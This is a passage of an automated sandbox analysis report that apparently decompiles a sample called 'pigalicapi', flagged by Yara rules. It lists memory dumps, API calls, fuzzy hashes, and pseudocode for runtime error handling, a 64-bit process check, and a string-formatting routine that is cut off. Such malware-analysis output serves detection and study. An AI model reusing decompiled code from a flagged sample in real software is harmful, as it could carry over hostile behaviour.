                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: e4ce2cea6e840e59eda562638da99292204e46b41f2237d8919655a512d606d5
                                                                                                                                                                                                                                                                            • Instruction ID: a128ced132ebb2e3ab8faee82a8ba83614045b2987a973bdc5e8b23aaabb69e4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4ce2cea6e840e59eda562638da99292204e46b41f2237d8919655a512d606d5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7116371540B08BAD620BBB0CC0BFCB779C5F44740F408C25B39DAA3A2DB75B9956792
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                                                            			E00C7F644(void* __ecx) {
                                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if( *0xd0db70 != 0xffffffff) {
                                                                                                                                                                                                                                                                            					_t25 = GetLastError();
                                                                                                                                                                                                                                                                            					_t11 = E00C808BE(__eflags,  *0xd0db70);
                                                                                                                                                                                                                                                                            					__eflags = _t11 - 0xffffffff;
                                                                                                                                                                                                                                                                            					if(_t11 == 0xffffffff) {
                                                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                                                            						_t11 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						__eflags = _t11;
                                                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                                                            							_t4 = E00C808F8(__eflags,  *0xd0db70, 0xffffffff);
                                                                                                                                                                                                                                                                            							_pop(_t16);
                                                                                                                                                                                                                                                                            							__eflags = _t4;
                                                                                                                                                                                                                                                                            							if(_t4 != 0) {
                                                                                                                                                                                                                                                                            								_t28 = E00C7A89E(_t16, 1, 0x28);
                                                                                                                                                                                                                                                                            								__eflags = _t28;
                                                                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                                                                            									L8:
                                                                                                                                                                                                                                                                            									_t11 = 0;
                                                                                                                                                                                                                                                                            									E00C808F8(__eflags,  *0xd0db70, 0);
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									__eflags = E00C808F8(__eflags,  *0xd0db70, _t28);
                                                                                                                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                                                                                                                            										_t11 = _t28;
                                                                                                                                                                                                                                                                            										_t28 = 0;
                                                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										goto L8;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								E00C7A8FB(_t28);
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								goto L5;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					SetLastError(_t25);
                                                                                                                                                                                                                                                                            					return _t11;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                                                            0x00c7f64b
                                                                                                                                                                                                                                                                            0x00c7f65e
                                                                                                                                                                                                                                                                            0x00c7f665
                                                                                                                                                                                                                                                                            0x00c7f668
                                                                                                                                                                                                                                                                            0x00c7f66b
                                                                                                                                                                                                                                                                            0x00c7f684
                                                                                                                                                                                                                                                                            0x00c7f684
                                                                                                                                                                                                                                                                            0x00c7f66d
                                                                                                                                                                                                                                                                            0x00c7f66d
                                                                                                                                                                                                                                                                            0x00c7f66f
                                                                                                                                                                                                                                                                            0x00c7f679
                                                                                                                                                                                                                                                                            0x00c7f67f
                                                                                                                                                                                                                                                                            0x00c7f680
                                                                                                                                                                                                                                                                            0x00c7f682
                                                                                                                                                                                                                                                                            0x00c7f692
                                                                                                                                                                                                                                                                            0x00c7f696
                                                                                                                                                                                                                                                                            0x00c7f698
                                                                                                                                                                                                                                                                            0x00c7f6ac
                                                                                                                                                                                                                                                                            0x00c7f6ac
                                                                                                                                                                                                                                                                            0x00c7f6b5
                                                                                                                                                                                                                                                                            0x00c7f69a
                                                                                                                                                                                                                                                                            0x00c7f6a8
                                                                                                                                                                                                                                                                            0x00c7f6aa
                                                                                                                                                                                                                                                                            0x00c7f6be
                                                                                                                                                                                                                                                                            0x00c7f6c0
                                                                                                                                                                                                                                                                            0x00c7f6c0
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7f6aa
                                                                                                                                                                                                                                                                            0x00c7f6c3
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7f682
                                                                                                                                                                                                                                                                            0x00c7f66f
                                                                                                                                                                                                                                                                            0x00c7f6cb
                                                                                                                                                                                                                                                                            0x00c7f6d5
                                                                                                                                                                                                                                                                            0x00c7f64d
                                                                                                                                                                                                                                                                            0x00c7f64f
                                                                                                                                                                                                                                                                            0x00c7f64f

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00C7F63B,00C7EA27), ref: 00C7F652
                                                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C7F660
                                                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C7F679
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00C7F63B,00C7EA27), ref: 00C7F6CB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8525e13f6e24b61afb58e2cae37b995982a07a1d2749556d71c8842041fa38b8
                                                                                                                                                                                                                                                                            • Instruction ID: 51888f4ebce94f7d80058b405476f4a822e3705db16340e6c405bc4631a7ef05
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8525e13f6e24b61afb58e2cae37b995982a07a1d2749556d71c8842041fa38b8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1301F132248311AEE76036B96CE5A1A3B69EF01778B30423FF12C802F0EF514C47A299
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                                                            			E00C79E50(void* __ebx, void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				intOrPtr _t2;
                                                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                                                            				long _t37;
                                                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t29 = __edx;
                                                                                                                                                                                                                                                                            				_t23 = __ecx;
                                                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                                                            				_t36 = GetLastError();
                                                                                                                                                                                                                                                                            				_t2 =  *0xd0d4dc; // 0x2
                                                                                                                                                                                                                                                                            				_t42 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                                            				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                                                            					_t3 = E00C7A89E(_t23, 1, 0x364);
                                                                                                                                                                                                                                                                            					_t31 = _t3;
                                                                                                                                                                                                                                                                            					_pop(_t25);
                                                                                                                                                                                                                                                                            					if(_t31 != 0) {
                                                                                                                                                                                                                                                                            						_t4 = E00C7AB4E(_t25, _t36, __eflags,  *0xd0d4dc, _t31);
                                                                                                                                                                                                                                                                            						__eflags = _t4;
                                                                                                                                                                                                                                                                            						if(_t4 != 0) {
                                                                                                                                                                                                                                                                            							E00C79CC2(_t25, _t31, 0xd0dd14);
                                                                                                                                                                                                                                                                            							E00C7A8FB(0);
                                                                                                                                                                                                                                                                            							_t40 = _t40 + 0xc;
                                                                                                                                                                                                                                                                            							__eflags = _t31;
                                                                                                                                                                                                                                                                            							if(_t31 == 0) {
                                                                                                                                                                                                                                                                            								goto L9;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								goto L8;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_push(_t31);
                                                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_push(_t3);
                                                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                                                            						E00C7A8FB();
                                                                                                                                                                                                                                                                            						_pop(_t25);
                                                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                                                            						SetLastError(_t36);
                                                                                                                                                                                                                                                                            						E00C7A85B(_t20, _t29, _t31, _t36);
                                                                                                                                                                                                                                                                            						asm("int3");
                                                                                                                                                                                                                                                                            						_push(_t20);
                                                                                                                                                                                                                                                                            						_push(_t36);
                                                                                                                                                                                                                                                                            						_push(_t31);
                                                                                                                                                                                                                                                                            						_t37 = GetLastError();
                                                                                                                                                                                                                                                                            						_t21 = 0;
                                                                                                                                                                                                                                                                            						_t9 =  *0xd0d4dc; // 0x2
                                                                                                                                                                                                                                                                            						_t45 = _t9 - 0xffffffff;
                                                                                                                                                                                                                                                                            						if(_t9 == 0xffffffff) {
                                                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                                                            							_t32 = E00C7A89E(_t25, 1, 0x364);
                                                                                                                                                                                                                                                                            							_pop(_t27);
                                                                                                                                                                                                                                                                            							if(_t32 != 0) {
                                                                                                                                                                                                                                                                            								_t11 = E00C7AB4E(_t27, _t37, __eflags,  *0xd0d4dc, _t32);
                                                                                                                                                                                                                                                                            								__eflags = _t11;
                                                                                                                                                                                                                                                                            								if(_t11 != 0) {
                                                                                                                                                                                                                                                                            									E00C79CC2(_t27, _t32, 0xd0dd14);
                                                                                                                                                                                                                                                                            									E00C7A8FB(_t21);
                                                                                                                                                                                                                                                                            									__eflags = _t32;
                                                                                                                                                                                                                                                                            									if(_t32 != 0) {
                                                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										goto L18;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_push(_t32);
                                                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_push(_t21);
                                                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                                                            								E00C7A8FB();
                                                                                                                                                                                                                                                                            								L18:
                                                                                                                                                                                                                                                                            								SetLastError(_t37);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t32 = E00C7AAF8(_t25, _t37, _t45, _t9);
                                                                                                                                                                                                                                                                            							if(_t32 != 0) {
                                                                                                                                                                                                                                                                            								L19:
                                                                                                                                                                                                                                                                            								SetLastError(_t37);
                                                                                                                                                                                                                                                                            								_t21 = _t32;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						return _t21;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t31 = E00C7AAF8(_t23, _t36, _t42, _t2);
                                                                                                                                                                                                                                                                            					if(_t31 != 0) {
                                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                                            						SetLastError(_t36);
                                                                                                                                                                                                                                                                            						return _t31;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                                                            0x00c79e50
                                                                                                                                                                                                                                                                            0x00c79e50
                                                                                                                                                                                                                                                                            0x00c79e50
                                                                                                                                                                                                                                                                            0x00c79e5a
                                                                                                                                                                                                                                                                            0x00c79e5c
                                                                                                                                                                                                                                                                            0x00c79e61
                                                                                                                                                                                                                                                                            0x00c79e64
                                                                                                                                                                                                                                                                            0x00c79e72
                                                                                                                                                                                                                                                                            0x00c79e79
                                                                                                                                                                                                                                                                            0x00c79e7e
                                                                                                                                                                                                                                                                            0x00c79e81
                                                                                                                                                                                                                                                                            0x00c79e84
                                                                                                                                                                                                                                                                            0x00c79e96
                                                                                                                                                                                                                                                                            0x00c79e9b
                                                                                                                                                                                                                                                                            0x00c79e9d
                                                                                                                                                                                                                                                                            0x00c79ea8
                                                                                                                                                                                                                                                                            0x00c79eaf
                                                                                                                                                                                                                                                                            0x00c79eb4
                                                                                                                                                                                                                                                                            0x00c79eb7
                                                                                                                                                                                                                                                                            0x00c79eb9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c79e9f
                                                                                                                                                                                                                                                                            0x00c79e9f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c79e9f
                                                                                                                                                                                                                                                                            0x00c79e86
                                                                                                                                                                                                                                                                            0x00c79e86
                                                                                                                                                                                                                                                                            0x00c79e87
                                                                                                                                                                                                                                                                            0x00c79e87
                                                                                                                                                                                                                                                                            0x00c79e8c
                                                                                                                                                                                                                                                                            0x00c79ec7
                                                                                                                                                                                                                                                                            0x00c79ec8
                                                                                                                                                                                                                                                                            0x00c79ece
                                                                                                                                                                                                                                                                            0x00c79ed3
                                                                                                                                                                                                                                                                            0x00c79ed6
                                                                                                                                                                                                                                                                            0x00c79ed7
                                                                                                                                                                                                                                                                            0x00c79ed8
                                                                                                                                                                                                                                                                            0x00c79edf
                                                                                                                                                                                                                                                                            0x00c79ee1
                                                                                                                                                                                                                                                                            0x00c79ee3
                                                                                                                                                                                                                                                                            0x00c79ee8
                                                                                                                                                                                                                                                                            0x00c79eeb
                                                                                                                                                                                                                                                                            0x00c79ef9
                                                                                                                                                                                                                                                                            0x00c79f05
                                                                                                                                                                                                                                                                            0x00c79f08
                                                                                                                                                                                                                                                                            0x00c79f0b
                                                                                                                                                                                                                                                                            0x00c79f1d
                                                                                                                                                                                                                                                                            0x00c79f22
                                                                                                                                                                                                                                                                            0x00c79f24
                                                                                                                                                                                                                                                                            0x00c79f2f
                                                                                                                                                                                                                                                                            0x00c79f35
                                                                                                                                                                                                                                                                            0x00c79f3d
                                                                                                                                                                                                                                                                            0x00c79f3f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c79f26
                                                                                                                                                                                                                                                                            0x00c79f26
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c79f26
                                                                                                                                                                                                                                                                            0x00c79f0d
                                                                                                                                                                                                                                                                            0x00c79f0d
                                                                                                                                                                                                                                                                            0x00c79f0e
                                                                                                                                                                                                                                                                            0x00c79f0e
                                                                                                                                                                                                                                                                            0x00c79f41
                                                                                                                                                                                                                                                                            0x00c79f42
                                                                                                                                                                                                                                                                            0x00c79f42
                                                                                                                                                                                                                                                                            0x00c79eed
                                                                                                                                                                                                                                                                            0x00c79ef3
                                                                                                                                                                                                                                                                            0x00c79ef7
                                                                                                                                                                                                                                                                            0x00c79f4a
                                                                                                                                                                                                                                                                            0x00c79f4b
                                                                                                                                                                                                                                                                            0x00c79f51
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c79ef7
                                                                                                                                                                                                                                                                            0x00c79f58
                                                                                                                                                                                                                                                                            0x00c79f58
                                                                                                                                                                                                                                                                            0x00c79e66
                                                                                                                                                                                                                                                                            0x00c79e6c
                                                                                                                                                                                                                                                                            0x00c79e70
                                                                                                                                                                                                                                                                            0x00c79ebb
                                                                                                                                                                                                                                                                            0x00c79ebc
                                                                                                                                                                                                                                                                            0x00c79ec6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c79e70

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00C760D1,?,?,?,00C74DA8,?), ref: 00C79E54
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79E87
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79EAF
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 00C79EBC
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 00C79EC8
                                                                                                                                                                                                                                                                            • _abort.LIBCMT ref: 00C79ECE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                            • Opcode ID: 60296140cd66e6c87803bf6f6fd0b4fdd69086d05f6444f8146967dbb4a732e8
                                                                                                                                                                                                                                                                            • Instruction ID: f2c8e5c69259c11196b06f4d44cf0d117ae15e30a521b804c3c0ec01c4862330
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60296140cd66e6c87803bf6f6fd0b4fdd69086d05f6444f8146967dbb4a732e8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7F0FF365007012AC312A379AC0AF2F361ACBC6760F20C025F86CA23E1EF31CC46A223
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C7C403,00C7A89D,?,00C7C3A3,00C7A89D,00CCB500,0000000C,00C7C4B6,00C7A89D,00000002), ref: 00C7C42E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C7C441
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00C7C403,00C7A89D,?,00C7C3A3,00C7A89D,00CCB500,0000000C,00C7C4B6,00C7A89D,00000002,00000000), ref: 00C7C464
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                            • Opcode ID: 970a812d73999e05256340b6a8c4a6b7b250a2ea2204fe50ea964d2c78769234
                                                                                                                                                                                                                                                                            • Instruction ID: 04770bd7a6ce6948c7788e3b4f90563d735146c90d5a6ac3ec83ae926502f00a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 970a812d73999e05256340b6a8c4a6b7b250a2ea2204fe50ea964d2c78769234
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBF0F631A00208BBEB119F90DC49FBEBFB4EF04712F004069F90AA6250DF344E44DB95
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                                                                            			E01179290() {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				_v12 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
                                                                                                                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                                                                                                                            					_v12(GetCurrentProcess(),  &_v8);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                            0x01179296
                                                                                                                                                                                                                                                                            0x011792b4
                                                                                                                                                                                                                                                                            0x011792bb
                                                                                                                                                                                                                                                                            0x011792c8
                                                                                                                                                                                                                                                                            0x011792c8
                                                                                                                                                                                                                                                                            0x011792d1

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 011792A7
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 011792AE
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 011792C1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 4190356694-3024904723
                                                                                                                                                                                                                                                                            • Opcode ID: 41693e8bcfd54cc8b77ce8d8fda1c4ffd738a3d702a18eb7da30f08e117e4b7b
                                                                                                                                                                                                                                                                            • Instruction ID: a224dd119ce29c3b63ff1ba4f3dcc5ed54f6c21cd20ca9480d657eca316dd19e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41693e8bcfd54cc8b77ce8d8fda1c4ffd738a3d702a18eb7da30f08e117e4b7b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09E01A78D40309EBCB14EBF4D94DB8DBBB8BB09206F5041A4E901A2344E7745684CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                                                                            			E01177250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                                                                            				int _v44;
                                                                                                                                                                                                                                                                            				int _v48;
                                                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                                                                                                                            				intOrPtr* _v72;
                                                                                                                                                                                                                                                                            				struct _SYSTEMTIME _v88;
                                                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                                                            				intOrPtr* _t68;
                                                                                                                                                                                                                                                                            				short* _t69;
                                                                                                                                                                                                                                                                            				signed int _t70;
                                                                                                                                                                                                                                                                            				intOrPtr* _t91;
                                                                                                                                                                                                                                                                            				void* _t97;
                                                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                                                            				intOrPtr* _t101;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 1;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 ||  *((intOrPtr*)(_a4 + 0x10)) == 0) {
                                                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                                                            					return _v5;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v24 = E011716F0(_a8, _a12);
                                                                                                                                                                                                                                                                            					_t58 =  *0x11818a0; // 0x1183b88
                                                                                                                                                                                                                                                                            					_v12 = _t58;
                                                                                                                                                                                                                                                                            					E01177D20(_t58,  &_v40, 0, 0x10);
                                                                                                                                                                                                                                                                            					wsprintfA( &_v40, "%u", _v24);
                                                                                                                                                                                                                                                                            					_t100 = _t97 + 0x20;
